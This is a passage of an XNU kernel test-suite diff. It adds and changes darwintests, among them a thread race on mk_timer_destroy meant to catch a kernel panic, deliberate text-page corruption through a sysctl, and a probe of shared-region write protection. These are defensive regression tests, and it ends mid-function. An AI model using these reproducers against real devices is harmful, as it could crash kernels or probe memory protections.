-#define DEXT_NAME "com.apple.test_intentionally_crashing_driver_56101852.dext"
-#define DEXT_PATH "/Library/DriverExtensions/" DEXT_NAME
-#define SYSCTL_NAME "kern.driverkit_checkin_timed_out"
-#define MAX_TIMEOUT_SECONDS 120
-
-static int
-copyfileCallback(int what __unused, int stage, copyfile_state_t state __unused, const char *src __unused, const char *dst, void *ctx __unused)
-{
-       if (stage == COPYFILE_FINISH) {
-               T_QUIET; T_ASSERT_POSIX_SUCCESS(chown(dst, 0, 0), "chown %s to root / wheel", dst);
-       }
-       return COPYFILE_CONTINUE;
-}
-
-static void
-cleanup(void)
-{
-       removefile_state_t state = removefile_state_alloc();
-       removefile(DEXT_PATH, state, REMOVEFILE_RECURSIVE);
-       removefile_state_free(state);
-}
-
-T_DECL(test_dext_launch_56101852,
-    "Test launching a crashing dext",
-    T_META_ASROOT(true), T_META_IGNORECRASHES("*test_intentionally_crashing_driver_56101852*"))
-{
-       T_SKIP("skipping test_dext_launch_56101852 due to 62657199");
-
-       CFStringRef path = NULL;
-       CFURLRef url = NULL;
-       uint64_t startTime = mach_absolute_time();
-       uint64_t endTime = 0;
-       size_t endTimeSize = sizeof(uint64_t);
-       uint64_t elapsedTimeAbs = 0;
-       uint64_t elapsedTimeNs = 0;
-       mach_timebase_info_data_t timebaseInfo;
-       copyfile_state_t copyfileState;
-
-       copyfileState = copyfile_state_alloc();
-       copyfile_state_set(copyfileState, COPYFILE_STATE_STATUS_CB, (void *)&copyfileCallback);
-       T_ASSERT_POSIX_SUCCESS(copyfile(DEXT_NAME, DEXT_PATH, copyfileState, COPYFILE_RECURSIVE | COPYFILE_ALL), "copied dext " DEXT_NAME " to " DEXT_PATH);
-       T_ATEND(cleanup);
-
-       /* set up timebaseInfo */
-       T_ASSERT_MACH_SUCCESS(mach_timebase_info(&timebaseInfo), "set up mach_timebase_info");
-
-       /* Set the initial value of kern.driverkit_checkin_timed_out to startTime */
-       T_ASSERT_POSIX_SUCCESS(sysctlbyname(SYSCTL_NAME, NULL, NULL, &startTime, sizeof(startTime)), "set sysctl " SYSCTL_NAME " to %llu", startTime);
-
-
-       /* Convert DEXT_PATH to a CFURL */
-       path = CFSTR(DEXT_PATH);
-       url = CFURLCreateWithFileSystemPath(kCFAllocatorDefault, path, kCFURLPOSIXPathStyle, true);
-       T_ASSERT_NOTNULL(url, "created CFURL from CFString");
-
-       /* Ask kextd to load the dext */
-       T_ASSERT_EQ(KextManagerLoadKextWithURL(url, NULL), kOSReturnSuccess, "Loaded dext %s with kextd", DEXT_PATH);
-       T_LOG("Will sleep for up to %d seconds", MAX_TIMEOUT_SECONDS);
-
-       /* Wait for up to 120 seconds. Each loop iteration sleeps for 1 second and checks
-        * the value of the sysctl to check if it has changed. If the value changed, then
-        * the dext loaded earlier has crashed. If 120 seconds elapses and the value does
-        * not change, then the dext did not crash.
-        */
-       for (int i = 0; i < MAX_TIMEOUT_SECONDS; i++) {
-               sleep(1);
-               T_ASSERT_POSIX_SUCCESS(sysctlbyname(SYSCTL_NAME, &endTime, &endTimeSize, NULL, 0), "using " SYSCTL_NAME " to check if dext has crashed");
-               if (endTime != startTime) {
-                       T_LOG("Detected dext crash");
-                       break;
-               }
-               T_LOG("    Slept for %d seconds", i + 1);
-       }
-
-       T_LOG("startTime = %llu, endTime = %llu", startTime, endTime);
-
-       T_ASSERT_GT(endTime, startTime, "dext has crashed");
-
-       /* Check how much time has elapsed and see if it is less than 120 seconds. If it
-        * is 120 seconds or greater, then the dext did not check in to the kernel but we
-        * were not able to stop waiting for the dext to check in after it crashed.
-        */
-       elapsedTimeAbs = endTime - startTime;
-       elapsedTimeNs = elapsedTimeAbs * timebaseInfo.numer / timebaseInfo.denom;
-       T_LOG("elapsedTimeAbs = %llu, elapsedTimeNs = %llu", elapsedTimeAbs, elapsedTimeNs);
-       T_ASSERT_LT(elapsedTimeNs / NSEC_PER_SEC, (uint64_t)MAX_TIMEOUT_SECONDS, "elapsed time is less than %d seconds", MAX_TIMEOUT_SECONDS);
-
-       copyfile_state_free(copyfileState);
-       CFRelease(url);
-}
diff --git a/tests/test_dext_launch_56101852.entitlements b/tests/test_dext_launch_56101852.entitlements
deleted file mode 100644 (file)
index 842b583..0000000
+++ /dev/null
@@ -1,8 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-       <key>com.apple.private.security.storage.SystemExtensionManagement</key>
-       <true/>
-</dict>
-</plist>
diff --git a/tests/test_utils.c b/tests/test_utils.c
new file mode 100644 (file)
index 0000000..e5197d4
--- /dev/null
@@ -0,0 +1,25 @@
+#include <sys/kern_sysctl.h>
+#include <sys/sysctl.h>
+#include <dispatch/dispatch.h>
+#include <darwintest.h>
+
+#include "test_utils.h"
+
+bool
+is_development_kernel()
+{
+       static dispatch_once_t is_development_once;
+       static bool is_development;
+
+       dispatch_once(&is_development_once, ^{
+               int dev;
+               size_t dev_size = sizeof(dev);
+
+               T_QUIET;
+               T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.development", &dev,
+               &dev_size, NULL, 0), NULL);
+               is_development = (dev != 0);
+       });
+
+       return is_development;
+}
diff --git a/tests/test_utils.h b/tests/test_utils.h
new file mode 100644 (file)
index 0000000..655e699
--- /dev/null
@@ -0,0 +1,8 @@
+#ifndef XNU_DARWINTEST_UTILS_H
+#define XNU_DARWINTEST_UTILS_H
+
+#include <stdbool.h>
+
+/* Misc. utility functions for writing darwintests. */
+bool is_development_kernel(void);
+#endif /* !defined(XNU_DARWINTEST_UTILS_H) */
diff --git a/tests/text_corruption.c b/tests/text_corruption.c
new file mode 100644 (file)
index 0000000..d2ebe07
--- /dev/null
@@ -0,0 +1,80 @@
+#include <unistd.h>
+#include <stdio.h>
+
+#include <darwintest.h>
+#include <darwintest_utils.h>
+
+T_GLOBAL_META(T_META_RUN_CONCURRENTLY(false));
+
+/*
+ * No system(3c) on watchOS, so provide our own.
+ * returns -1 if fails to run
+ * returns 0 if process exits normally.
+ * returns +n if process exits due to signal N
+ */
+static int
+my_system(const char *command)
+{
+       pid_t pid;
+       int status = 0;
+       int signal = 0;
+       int err;
+       const char *argv[] = {
+               "/bin/sh",
+               "-c",
+               command,
+               NULL
+       };
+
+       if (dt_launch_tool(&pid, (char **)(void *)argv, FALSE, NULL, NULL)) {
+               return -1;
+       }
+
+       err = dt_waitpid(pid, &status, &signal, 30);
+       if (err) {
+               return 0;
+       }
+
+       return signal;
+}
+
+
+/*
+ * The tests are run in the following order:
+ *
+ * - call foo
+ * - corrupt foo, then call foo
+ * - call foo
+ *
+ * - call atan
+ * - corrupt atan, then call atan
+ * - call atan
+ *
+ * The first and last of each should exit normally. The middle one should exit with SIGILL.
+ *
+ * atan() was picked as a shared region function that isn't likely used by any normal daemons.
+ */
+T_DECL(text_corruption_recovery, "test detection/recovery of text corruption",
+    T_META_IGNORECRASHES(".*text_corruption_helper.*"),
+    T_META_ASROOT(true))
+{
+       int ret;
+
+       ret = my_system("./text_corruption_helper foo");
+       T_QUIET; T_ASSERT_EQ(ret, 0, "First call of foo");
+
+       ret = my_system("./text_corruption_helper Xfoo");
+       T_QUIET; T_ASSERT_EQ(ret, SIGILL, "Call of corrupted foo");
+
+       ret = my_system("./text_corruption_helper foo");
+       T_QUIET; T_ASSERT_EQ(ret, 0, "Fixed call of foo");
+
+       ret = my_system("./text_corruption_helper atan");
+       T_QUIET; T_ASSERT_EQ(ret, 0, "First call of atan");
+
+       ret = my_system("./text_corruption_helper Xatan");
+       T_QUIET; T_ASSERT_EQ(ret, SIGILL, "Call of corrupted atan");
+
+       ret = my_system("./text_corruption_helper atan");
+       T_QUIET; T_ASSERT_EQ(ret, 0, "Fixed call of atan");
+}
diff --git a/tests/text_corruption_helper.c b/tests/text_corruption_helper.c
new file mode 100644 (file)
index 0000000..576836a
--- /dev/null
@@ -0,0 +1,56 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <sys/sysctl.h>
+#include <ptrauth.h>
+#include <math.h>
+#include <string.h>
+
+__attribute__((noinline))
+static void
+foo(void)
+{
+       printf("In foo()\n");
+       fflush(stdout);
+}
+
+/*
+ * volatile to stop the compiler from optimizing away calls to atan()
+ */
+volatile double zero = 0.0;
+
+int
+main(int argc, char **argv)
+{
+       void *addr;
+       size_t s = sizeof(addr);
+       int err;
+       int a;
+
+       /*
+        * needs to run as root for sysctl.
+        */
+       if (geteuid() != 0) {
+               printf("Test not running as root\n");
+               exit(-1);
+       }
+
+       if (strcmp(argv[argc - 1], "foo") == 0) {
+               foo();
+       } else if (strcmp(argv[argc - 1], "Xfoo") == 0) {
+               printf("Warm up call to foo()\n");
+               foo();
+               addr = ptrauth_strip(&foo, ptrauth_key_function_pointer);
+               err = sysctlbyname("vm.corrupt_text_addr", NULL, NULL, &addr, s);
+               foo();
+       } else if (strcmp(argv[argc - 1], "atan") == 0) {
+               printf("atan(0) is %g\n", atan(zero));
+       } else if (strcmp(argv[argc - 1], "Xatan") == 0) {
+               printf("Warmup call to atan(0) is %g\n", atan(zero));
+               addr = ptrauth_strip(&atan, ptrauth_key_function_pointer);
+               err = sysctlbyname("vm.corrupt_text_addr", NULL, NULL, &addr, s);
+               printf("atan(0) is %g\n", atan(zero));
+       } else {
+               exit(-1);
+       }
+}
diff --git a/tests/thread_call_race_71455282.c b/tests/thread_call_race_71455282.c
new file mode 100644 (file)
index 0000000..df5d8c8
--- /dev/null
@@ -0,0 +1,52 @@
+#include <darwintest.h>
+#include <pthread.h>
+#include <sys/syscall.h>
+#include <unistd.h>
+
+#include <mach/mach_init.h>
+#include <mach/mach_port.h>
+#include <mach/mk_timer.h>
+#include <mach/task.h>
+
+#define die(w) errx(1, (w))
+#define edie(w) err(1, (w))
+#define expect(e) if (-1 == (e)) edie(#e)
+
+static void *
+racer(void *data)
+{
+       for (;;) {
+               mk_timer_destroy(*(mach_port_t *)data);
+       }
+
+       return NULL;
+}
+
+T_DECL(thread_call_race_71455282,
+    "rdar://71455282",
+    T_META_IGNORECRASHES(".*thread_call_race_71455282.*"))
+{
+       mach_port_t timer = MACH_PORT_NULL;
+       pthread_t t;
+       size_t n;
+
+       /* we will violate mach rules so ignore crashes here */
+       T_ASSERT_MACH_SUCCESS(task_set_exc_guard_behavior(mach_task_self(), 0),
+           "task_set_exc_guard_behavior");
+
+       for (n = 0; n < 4; ++n) {
+               T_ASSERT_POSIX_SUCCESS(pthread_create(&t, NULL, racer, &timer),
+                   "pthread_create");
+       }
+
+       T_LOG("racing");
+       for (size_t i = 0; i < 1000; i++) {
+               timer = mk_timer_create();
+               mk_timer_arm(timer, 1);
+               mk_timer_destroy(timer);
+               timer = MACH_PORT_NULL;
+       }
+
+       T_PASS("didn't panic");
+       T_END;
+}
diff --git a/tests/trial_experiments.c b/tests/trial_experiments.c
new file mode 100644 (file)
index 0000000..fd197cd
--- /dev/null
@@ -0,0 +1,83 @@
+#include <errno.h>
+#include <sys/types.h>
+#include <sys/sysctl.h>
+
+#include <darwintest.h>
+
+#include "drop_priv.h"
+#include "test_utils.h"
+
+#if ENTITLED
+#define SET_TREATMENT_ID set_treatment_id_entitled
+#define SET_TREATMENT_ID_DESCR "Can set treatment id with entitlement"
+#else /* ENTITLED */
+#define SET_TREATMENT_ID set_treatment_id_unentitled
+#define SET_TREATMENT_ID_DESCR "Can't set treatment id without entitlement"
+#endif /* ENTITLED */
+
+T_DECL(SET_TREATMENT_ID, "Verifies that EXPERIMENT sysctls can only be set with the entitlement", T_META_ASROOT(false))
+{
+#define TEST_STR "testing"
+#define IDENTIFIER_LENGTH 36
+
+       int ret;
+       errno_t err;
+       char val[IDENTIFIER_LENGTH + 1] = {0};
+       size_t len = sizeof(val);
+       char new_val[IDENTIFIER_LENGTH + 1] = {0};
+
+       if (!is_development_kernel()) {
+               T_SKIP("skipping test on release kernel");
+       }
+
+       strlcpy(new_val, TEST_STR, sizeof(new_val));
+       drop_priv();
+
+       ret = sysctlbyname("kern.trial_treatment_id", val, &len, new_val, strlen(new_val));
+       err = errno;
+#if ENTITLED
+       len = sizeof(val);
+       memset(new_val, 0, sizeof(new_val));
+       T_ASSERT_POSIX_SUCCESS(ret, "set kern.trial_treatment_id");
+       /* Cleanup. Set it back to the empty string. */
+       ret = sysctlbyname("kern.trial_treatment_id", val, &len, new_val, 1);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "reset kern.trial_treatment_id");
+#else
+       T_ASSERT_POSIX_FAILURE(ret, EPERM, "set kern.trial_treatment_id");
+#endif /* ENTITLED */
+}
+
+#if ENTITLED
+/* Check min and max value limits on numeric factors */
+T_DECL(experiment_factor_numeric_limits,
+    "Can only set factors within the legal range.",
+    T_META_ASROOT(false))
+{
+#define kMinVal 5 /* The min value allowed for the testing factor. */
+#define kMaxVal 10 /* The max value allowed for the testing factor. */
+       errno_t err;
+       int ret;
+       unsigned int current_val;
+       size_t len = sizeof(current_val);
+       unsigned int new_val;
+
+       drop_priv();
+       new_val = kMinVal - 1;
+       ret = sysctlbyname("kern.testing_experiment_factor", &current_val, &len, &new_val, sizeof(new_val));
+       err = errno;
+       T_ASSERT_POSIX_FAILURE(ret, EINVAL, "set kern.testing_experiment_factor below range.");
+
+       new_val = kMaxVal + 1;
+       ret = sysctlbyname("kern.testing_experiment_factor", &current_val, &len, &new_val, sizeof(new_val));
+       err = errno;
+       T_ASSERT_POSIX_FAILURE(ret, EINVAL, "set kern.testing_experiment_factor above range.");
+
+       new_val = kMaxVal;
+       ret = sysctlbyname("kern.testing_experiment_factor", &current_val, &len, &new_val, sizeof(new_val));
+       T_ASSERT_POSIX_SUCCESS(ret, "set kern.testing_experiment_factor at top of range.");
+
+       new_val = kMinVal;
+       ret = sysctlbyname("kern.testing_experiment_factor", &current_val, &len, &new_val, sizeof(new_val));
+       T_ASSERT_POSIX_SUCCESS(ret, "set kern.testing_experiment_factor at bottom of range.");
+}
+#endif /* ENTITLED */
diff --git a/tests/trial_experiments.entitlements b/tests/trial_experiments.entitlements
new file mode 100644 (file)
index 0000000..4d1bd47
--- /dev/null
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+       <key>com.apple.private.write-kr-experiment-factors</key>
+       <true/>
+</dict>
+</plist>
index 3cf9ef1b2d8132f68eb0e2a41ae47f2b08147da8..fbfcb39510352130bf1d63e1ac91958491f5838f 100644 (file)
@@ -42,7 +42,7 @@
 #include <pthread.h>
 #include <stdatomic.h>
 
-#include "vm/perf_helpers.h"
+#include "benchmark/helpers.h"
 
 #if (TARGET_OS_OSX || TARGET_OS_SIMULATOR)
 /*
@@ -121,10 +121,6 @@ typedef struct test_args {
        bool verbose;
 } test_args_t;
 
-/* Get a (wall-time) timestamp in nanoseconds */
-static uint64_t get_timestamp_ns(void);
-/* Get the number of cpus on this device. */
-static unsigned int get_ncpu(void);
 /*
  * Fault in the pages in the given buffer.
  */
@@ -197,7 +193,7 @@ main(int argc, char **argv)
 #else
        static const size_t memory_per_core = 25 * (1UL << 20);
 #endif /* (TARGET_OS_OSX || TARGET_OS_SIMULATOR) */
-       const size_t kMemSize = memory_per_core * get_ncpu();
+       const size_t kMemSize = memory_per_core * (size_t) get_ncpu();
        test_globals_t *globals = allocate_test_globals();
        /* Total wall-time spent faulting in pages. */
        uint64_t wall_time_elapsed_ns = 0;
@@ -368,7 +364,7 @@ start_iteration(test_globals_t* globals, test_variant_t variant, bool verbose)
        setup_memory(globals, variant);
        benchmark_log(verbose, "Initialized data structures for iteration. Waking workers.\n");
        /* Grab a timestamp, tick the current iteration, and wake up the worker threads */
-       start_time = get_timestamp_ns();
+       start_time = current_timestamp_ns();
        globals->tg_current_iteration++;
        ret = pthread_mutex_unlock(&globals->tg_lock);
        assert(ret == 0);
@@ -387,7 +383,7 @@ finish_iteration(test_globals_t* globals, uint64_t start_time)
        while (globals->tg_iterations_completed != globals->tg_current_iteration) {
                ret = pthread_cond_wait(&globals->tg_cv, &globals->tg_lock);
        }
-       end_time = get_timestamp_ns();
+       end_time = current_timestamp_ns();
        ret = pthread_mutex_unlock(&globals->tg_lock);
        unmap_fault_buffers(globals);
        assert(ret == 0);
@@ -602,22 +598,6 @@ print_help(char** argv)
        fprintf(stderr, "       %s              Share vm objects across faulting threads.\n", kShareObjectsArgument);
 }
 
-static uint64_t
-get_timestamp_ns()
-{
-       return clock_gettime_nsec_np(kWallTimeClock);
-}
-
-static unsigned int
-get_ncpu(void)
-{
-       int ncpu;
-       size_t sysctl_size = sizeof(ncpu);
-       int ret = sysctlbyname("hw.ncpu", &ncpu, &sysctl_size, NULL, 0);
-       assert(ret == 0);
-       return (unsigned int) ncpu;
-}
-
 static void
 parse_arguments(int argc, char** argv, test_args_t *args)
 {
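The helpers deleted above now come from the shared benchmark/helpers.h; a sketch of what those replacements presumably look like, reconstructed from the removed code (the exact clock behind the old kWallTimeClock constant is an assumption):

    #include <assert.h>
    #include <stdint.h>
    #include <sys/sysctl.h>
    #include <time.h>

    /* Wall-time timestamp in nanoseconds (the deleted get_timestamp_ns()). */
    uint64_t
    current_timestamp_ns(void)
    {
            /* assumed clock; the original used a local kWallTimeClock constant */
            return clock_gettime_nsec_np(CLOCK_MONOTONIC_RAW);
    }

    /* Number of logical CPUs (the deleted get_ncpu()). */
    unsigned int
    get_ncpu(void)
    {
            int ncpu = 0;
            size_t size = sizeof(ncpu);
            int ret = sysctlbyname("hw.ncpu", &ncpu, &size, NULL, 0);
            assert(ret == 0);
            return (unsigned int)ncpu;
    }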
diff --git a/tests/vm/page_size_globals.c b/tests/vm/page_size_globals.c
new file mode 100644 (file)
index 0000000..3e563ce
--- /dev/null
@@ -0,0 +1,43 @@
+#include <darwintest.h>
+#include <mach/vm_page_size.h>
+
+T_GLOBAL_META(
+       T_META_NAMESPACE("vm_page_size_overrides")
+       );
+
+static void
+verify_page_size(
+       int expected_shift,
+       int page_shift,
+       vm_size_t page_size,
+       vm_size_t page_mask)
+{
+       T_ASSERT_EQ(page_shift, expected_shift, "page_shift");
+       T_ASSERT_EQ(page_size, 1UL << expected_shift, "page_size");
+       T_ASSERT_EQ(page_mask, page_size - 1, "page_mask");
+}
+
+
+T_DECL(kernel_4k,
+    "Can override vm_kernel_page_size",
+    T_META_ENVVAR("VM_KERNEL_PAGE_SIZE_4K=1"),
+    T_META_ENVVAR("MallocGuardEdges=0"),
+    T_META_ENVVAR("MallocDoNotProtectPrelude=1"),
+    T_META_ENVVAR("MallocDoNotProtectPostlude=1"))
+{
+       verify_page_size(12, vm_kernel_page_shift, vm_kernel_page_size, vm_kernel_page_mask);
+}
+
+T_DECL(invalid,
+    "Invalid overrides",
+    T_META_ENVVAR("VM_KERNEL_PAGE_SIZE_4K=2"),
+    T_META_ENVVAR("VM_KERNEL_PAGE_SIZE=4K"),
+    T_META_ENVVAR("VM_KERNEL_PAGE_SIZE="))
+{
+       /*
+        * This test just verifies that libkernel_init doesn't
+        * crash when handling invalid overrides.
+        * So if we got here, we can pass the test.
+        */
+       T_PASS("Test process spawned");
+}
diff --git a/tests/vm/perf_helpers.c b/tests/vm/perf_helpers.c
deleted file mode 100644 (file)
index b4dea31..0000000
+++ /dev/null
@@ -1,69 +0,0 @@
-#include <assert.h>
-#include <errno.h>
-#include <stdarg.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-
-#include <sys/mman.h>
-
-#include "vm/perf_helpers.h"
-
-#define K_CTIME_BUFFER_LEN  26
-void
-benchmark_log(bool verbose, const char *restrict fmt, ...)
-{
-       time_t now;
-       char time_buffer[K_CTIME_BUFFER_LEN];
-       struct tm local_time;
-       va_list args;
-       if (verbose) {
-               strncpy(time_buffer, "UNKNOWN", K_CTIME_BUFFER_LEN);
-
-               now = time(NULL);
-               if (now != -1) {
-                       struct tm* ret = localtime_r(&now, &local_time);
-                       if (ret == &local_time) {
-                               snprintf(time_buffer, K_CTIME_BUFFER_LEN,
-                                   "%.2d/%.2d/%.2d %.2d:%.2d:%.2d",
-                                   local_time.tm_mon + 1, local_time.tm_mday,
-                                   local_time.tm_year + 1900,
-                                   local_time.tm_hour, local_time.tm_min,
-                                   local_time.tm_sec);
-                       }
-               }
-
-               printf("%s: ", time_buffer);
-               va_start(args, fmt);
-               vprintf(fmt, args);
-               fflush(stdout);
-       }
-}
-
-uint64_t
-timespec_difference_us(const struct timespec* a, const struct timespec* b)
-{
-       assert(a->tv_sec >= b->tv_sec || a->tv_nsec >= b->tv_nsec);
-       long seconds_elapsed = a->tv_sec - b->tv_sec;
-       uint64_t nsec_elapsed;
-       if (b->tv_nsec > a->tv_nsec) {
-               seconds_elapsed--;
-               nsec_elapsed = kNumNanosecondsInSecond - (uint64_t) (b->tv_nsec - a->tv_nsec);
-       } else {
-               nsec_elapsed = (uint64_t) (a->tv_nsec - b->tv_nsec);
-       }
-       return (uint64_t) seconds_elapsed * kNumMicrosecondsInSecond + nsec_elapsed / kNumNanosecondsInMicrosecond;
-}
-
-unsigned char *
-mmap_buffer(size_t memsize)
-{
-       int fd = -1;
-       unsigned char* addr = (unsigned char *)mmap(NULL, memsize, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE,
-           fd, 0);
-       if ((void*) addr == MAP_FAILED) {
-               fprintf(stderr, "Unable to mmap a memory object: %s\n", strerror(errno));
-               exit(2);
-       }
-       return addr;
-}
diff --git a/tests/vm/perf_helpers.h b/tests/vm/perf_helpers.h
deleted file mode 100644 (file)
index 53633f5..0000000
+++ /dev/null
@@ -1,34 +0,0 @@
-#ifndef VM_PERF_HELPERS_H
-#define VM_PERF_HELPERS_H
-
-/*
- * Utility functions and constants used by the VM perf tests.
- */
-#include <inttypes.h>
-#include <time.h>
-#include <stdbool.h>
-
-/*
- * mmap an anonymous chunk of memory.
- */
-unsigned char *mmap_buffer(size_t size);
-/*
- * Returns a - b in microseconds.
- * NB: a must be >= b
- */
-uint64_t timespec_difference_us(const struct timespec* a, const struct timespec* b);
-/*
- * Print the message to stdout along with the current time.
- * Also flushes stdout so that the log can help detect hangs. Don't call
- * this function from within the measured portion of the benchmark as it will
- * pollute your measurement.
- *
- * NB: Will only log if verbose == true.
- */
-void benchmark_log(bool verbose, const char *restrict fmt, ...) __attribute__((format(printf, 2, 3)));
-
-static const uint64_t kNumMicrosecondsInSecond = 1000UL * 1000;
-static const uint64_t kNumNanosecondsInMicrosecond = 1000UL;
-static const uint64_t kNumNanosecondsInSecond = kNumNanosecondsInMicrosecond * kNumMicrosecondsInSecond;
-
-#endif /* !defined(VM_PERF_HELPERS_H) */
index b579361b3eb240782333b2524764f9ef425d1dec..c8fd4548728321deea28ab4985c8ad01994b1d73 100644 (file)
@@ -12,7 +12,7 @@
 #include <sys/mman.h>
 #include <sys/sysctl.h>
 
-#include "vm/perf_helpers.h"
+#include "benchmark/helpers.h"
 
 typedef enum test_variant {
        VARIANT_MADVISE_FREE
diff --git a/tests/vm/retired_pages.c b/tests/vm/retired_pages.c
new file mode 100644 (file)
index 0000000..95a5706
--- /dev/null
@@ -0,0 +1,46 @@
+#include <sys/sysctl.h>
+#include <time.h>
+
+#include <darwintest.h>
+
+/*
+ * trying phys offsets from start of dram of:
+ * watchOS 512Meg
+ * macOS 3Gig
+ * iOS,etc. 750Meg
+ */
+#if TARGET_OS_WATCH
+#define USEBOOTARG "bad_ram_pages=536870912 bad_static_mfree=1"
+#elif TARGET_OS_OSX
+#define USEBOOTARG "bad_ram_pages=3221225472 bad_static_mfree=1"
+#else
+#define USEBOOTARG "bad_ram_pages=786432000 bad_static_mfree=1"
+#endif
+
+T_DECL(retired_pages_test,
+    "Test retiring pages at boot",
+    T_META_NAMESPACE("xnu.vm"),
+    T_META_BOOTARGS_SET(USEBOOTARG),
+    T_META_ASROOT(true),
+    T_META_CHECK_LEAKS(false))
+{
+       int err;
+       unsigned int count = 0;
+       size_t s = sizeof(count);
+
+#if !defined(__arm64__) || TARGET_OS_BRIDGE
+       T_SKIP("No page retirement on x86, arm32 or bridgeOS kernels");
+#endif
+       /*
+        * Get the number of pages retired from the kernel
+        */
+       err = sysctlbyname("vm.retired_pages_count", &count, &s, NULL, 0);
+
+       /* If the sysctl isn't supported, test succeeds */
+       if (err == ENOENT) {
+               T_SKIP("sysctl vm.retired_pages_count not found, skipping test");
+       }
+       T_ASSERT_POSIX_SUCCESS(err, "sysctl vm.retired_pages_count");
+
+       T_ASSERT_GT_INT(count, 0, "Expect retired pages");
+}
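For reference, the bad_ram_pages values in USEBOOTARG are plain byte offsets from the start of DRAM; the arithmetic behind the three constants:

    512 MiB (watchOS)        = 512 * 2^20 = 536870912
    3 GiB   (macOS)          =   3 * 2^30 = 3221225472
    750 MiB (iOS and others) = 750 * 2^20 = 786432000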
index 0c429d725040c2e408bc51ed45a29711765df450..7c799c77540db6e079fdbb226e7f194d96a99a35 100644 (file)
@@ -1,3 +1,4 @@
+#include <TargetConditionals.h>
 #include <errno.h>
 #include <stdio.h>
 #include <stdlib.h>
@@ -140,13 +141,13 @@ main(
        fprintf(stdout, "%s: WARNING: unsigned code was executed\n",
            cmdname);
 
-#if CONFIG_EMBEDDED
+#if !TARGET_OS_OSX
        /* fail: unsigned code was executed */
        fprintf(stdout, "%s: FAIL\n", cmdname);
        exit(1);
-#else /* CONFIG_EMBEDDED */
+#else /* !TARGET_OS_OSX */
        /* no fail: unsigned code is only prohibited on embedded platforms */
        fprintf(stdout, "%s: SUCCESS\n", cmdname);
        exit(0);
-#endif /* CONFIG_EMBEDDED */
+#endif /* !TARGET_OS_OSX */
 }
index 2ab86744fd01e8461f216508622a5564efbe4a89..6fd927b7794e312b19fb38de193d5c338ff29e6f 100644 (file)
@@ -7,6 +7,7 @@
  */
 #include <darwintest.h>
 
+#include <dlfcn.h>
 #include <errno.h>
 #include <ptrauth.h>
 #include <stdio.h>
@@ -623,7 +624,7 @@ T_DECL(madvise_shared, "test madvise shared for rdar://problem/2295713 logging \
        }
 
 #if defined(__x86_64__) || defined(__i386__)
-       if (*((uint64_t *)_COMM_PAGE_CPU_CAPABILITIES64) & kIsTranslated) {
+       if (COMM_PAGE_READ(uint64_t, CPU_CAPABILITIES64) & kIsTranslated) {
                T_LOG("Skipping madvise reusable tests because we're running under translation.");
                goto done;
        }
@@ -672,7 +673,7 @@ T_DECL(madvise_purgeable_can_reuse, "test madvise purgeable can reuse for \
     T_META_ALL_VALID_ARCHS(true))
 {
 #if defined(__x86_64__) || defined(__i386__)
-       if (*((uint64_t *)_COMM_PAGE_CPU_CAPABILITIES64) & kIsTranslated) {
+       if (COMM_PAGE_READ(uint64_t, CPU_CAPABILITIES64) & kIsTranslated) {
                T_SKIP("madvise reusable is not supported under Rosetta translation. Skipping.)");
        }
 #endif /* defined(__x86_64__) || defined(__i386__) */
@@ -951,6 +952,677 @@ T_DECL(nested_pmap_trigger, "nested pmap should only be triggered from kernel \
        T_ASSERT_MACH_SUCCESS(kr, "vm_map()");
 }
 
+static const char *prot_str[] = { "---", "r--", "-w-", "rw-", "--x", "r-x", "-wx", "rwx" };
+static const char *share_mode_str[] = { "---", "COW", "PRIVATE", "EMPTY", "SHARED", "TRUESHARED", "PRIVATE_ALIASED", "SHARED_ALIASED", "LARGE_PAGE" };
+
+T_DECL(shared_region_share_writable, "sharing a writable mapping of the shared region should not give write access to the shared region - rdar://problem/74469953",
+    T_META_ALL_VALID_ARCHS(true))
+{
+       int ret;
+       uint64_t sr_start;
+       kern_return_t kr;
+       mach_vm_address_t address, tmp_address, remap_address;
+       mach_vm_size_t size, tmp_size, remap_size;
+       uint32_t depth;
+       mach_msg_type_number_t count;
+       vm_region_submap_info_data_64_t info;
+       vm_prot_t cur_prot, max_prot;
+       uint32_t before, after, remap;
+       mach_port_t mem_entry;
+
+       ret = __shared_region_check_np(&sr_start);
+       if (ret != 0) {
+               int saved_errno;
+               saved_errno = errno;
+
+               T_ASSERT_EQ(saved_errno, ENOMEM, "__shared_region_check_np() %d (%s)",
+                   saved_errno, strerror(saved_errno));
+               T_END;
+       }
+       T_LOG("SHARED_REGION_BASE 0x%llx", SHARED_REGION_BASE);
+       T_LOG("SHARED_REGION_SIZE 0x%llx", SHARED_REGION_SIZE);
+       T_LOG("shared region starts at 0x%llx", sr_start);
+       T_QUIET; T_ASSERT_GE(sr_start, SHARED_REGION_BASE,
+           "shared region starts below BASE");
+       T_QUIET; T_ASSERT_LT(sr_start, SHARED_REGION_BASE + SHARED_REGION_SIZE,
+           "shared region starts above BASE+SIZE");
+
+       /*
+        * Step 1 - check that one can not get write access to a read-only
+        * mapping in the shared region.
+        */
+       size = 0;
+       for (address = SHARED_REGION_BASE;
+           address < SHARED_REGION_BASE + SHARED_REGION_SIZE;
+           address += size) {
+               size = 0;
+               depth = 99;
+               count = VM_REGION_SUBMAP_INFO_COUNT_64;
+               kr = mach_vm_region_recurse(mach_task_self(),
+                   &address,
+                   &size,
+                   &depth,
+                   (vm_region_recurse_info_t)&info,
+                   &count);
+               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_region_recurse()");
+               if (kr == KERN_INVALID_ADDRESS) {
+                       T_SKIP("could not find read-only nested mapping");
+                       T_END;
+               }
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+               T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+                   address, address + size, depth,
+                   prot_str[info.protection],
+                   prot_str[info.max_protection],
